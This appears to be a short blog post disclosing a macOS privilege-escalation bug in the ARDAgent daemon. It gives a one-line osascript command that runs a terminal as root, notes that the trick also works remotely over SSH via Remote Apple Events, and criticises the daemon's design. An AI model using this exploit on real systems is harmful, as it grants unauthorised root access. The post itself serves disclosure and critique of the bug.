How to root your Mac in 5 seconds
Maybe 10 if you’re a slow typist. In short:
osascript -e 'tell app "ARDAgent" to do shell script "/Applications/iTerm.app/Contents/MacOS/iTerm"'
You might get a few screenfulls of errors
but the command WILL execute:
This is by far the dumbest bug I’ve encountered in the past decade, and one that makes me appreciate for the first time the separation between desktop applications and services enforced in Windows NT. A system daemon, running with root privileges, should never ever accept arbitrary input from arbitrary processes, running under arbitrary accounts, and, at the very least, it should try to NOT EXECUTE THE FUCKING INPUT.
Several mentions on the web claim that this requires local access or that the calling user is also logged on to the graphical interface, this is incorrect, AppleScript can be invoked over a ssh session by a different user (hint: Remote Apple Events)